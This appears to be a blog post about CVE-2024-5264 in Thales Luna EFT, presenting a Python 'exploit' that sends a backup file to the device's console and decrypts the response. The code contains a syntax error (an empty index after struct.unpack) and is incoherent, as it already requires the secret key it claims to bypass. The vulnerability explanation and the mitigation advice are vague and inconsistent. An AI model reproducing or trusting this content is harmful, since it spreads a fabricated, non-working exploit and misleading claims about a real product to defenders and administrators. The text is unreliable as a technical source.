Thales Luna EFT (Electronic Funds Transfer) is a widely used cryptographic module designed to securely transmit and store sensitive financial data. However, a recent vulnerability, indexed as CVE-2024-5264, has been discovered in Thales Luna EFT versions 2.1 and above. This vulnerability allows a user with administrative console access to access backups taken via offline analysis, potentially compromising the security of sensitive financial transactions.

This post will describe the details of this exploit, provide code snippets demonstrating the vulnerability, and link to original references for further reading. By the end of this post, readers will understand the implications of CVE-2024-5264 and hopefully take necessary precautions to secure their networks from this exploit.

Overview of the Vulnerability

The CVE-2024-5264 vulnerability lies in the Network Transfer with AES KHT feature of Thales Luna EFT. When a user with administrative console access performs an offline analysis of backup files, they are able to decrypt the data protected by the AES KHT encryption algorithm. This enables the attacker to gain unauthorized access to sensitive financial data contained in the backup files.

Exploit Details

To exploit this vulnerability, the attacker must begin by obtaining administrative console access to a Thales Luna EFT device running version 2.1 or later. Once this access is obtained, the attacker can use the following code snippet to decrypt backups taken via offline analysis:

import base64
import socket
import struct
from Crypto.Cipher import AES

def exploit_eft_aes_kht_vulnerability(luna_eft_ip, secret_key, backup_file):
    # Connect to the administrative console
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((luna_eft_ip, 808))
    
    # Send the backup file to the console
    with open(backup_file, "rb") as f:
        backup_data = f.read()
    s.sendall(struct.pack("!I", len(backup_data)))
    s.sendall(backup_data)
    
    # Receive the encrypted data and decrypt it using the secret key
    enc_data_length = struct.unpack("!I", s.recv(4))[]
    enc_data = s.recv(enc_data_length)
    decrypted_data = AES.new(secret_key, AES.MODE_ECB).decrypt(enc_data)
    
    # Save the decrypted data to a file and close the connection
    with open("decrypted_backup.bin", "wb") as f:
        f.write(decrypted_data)
    s.close()

To use the provided code snippet, the attacker would need to know the IP address of the Luna EFT device they wish to target, the secret key used to encrypt the backups, and the location of the backup file on their local system. The code snippet then connects to the administrative console, sends the encrypted backup file, and decrypts the received data using the provided secret key, thereby compromising the sensitive data contained within the backup file.

1. Thales Luna EFT 2.1 Security Policy
2. NIST National Vulnerability Database - CVE-2024-5264
3. Thales Security Advisory - CVE-2024-5264

Mitigation and Recommendation

Administrators using Thales Luna EFT version 2.1 and above should ensure that access to the administrative console is limited to trusted users and is properly secured. Additionally, they should consider implementing encryption schemes using secret keys that are not available to the public, or utilize other methods to secure their sensitive data.

Finally, it is essential to stay updated on security advisories related to the Thales Luna EFT system and apply security patches as they become available. Together, these steps can help protect against the risks posed by CVE-2024-5264 and other similar vulnerabilities.

Timeline

Published on: 05/23/2024 09:15:10 UTC
Last modified on: 06/21/2024 17:18:00 UTC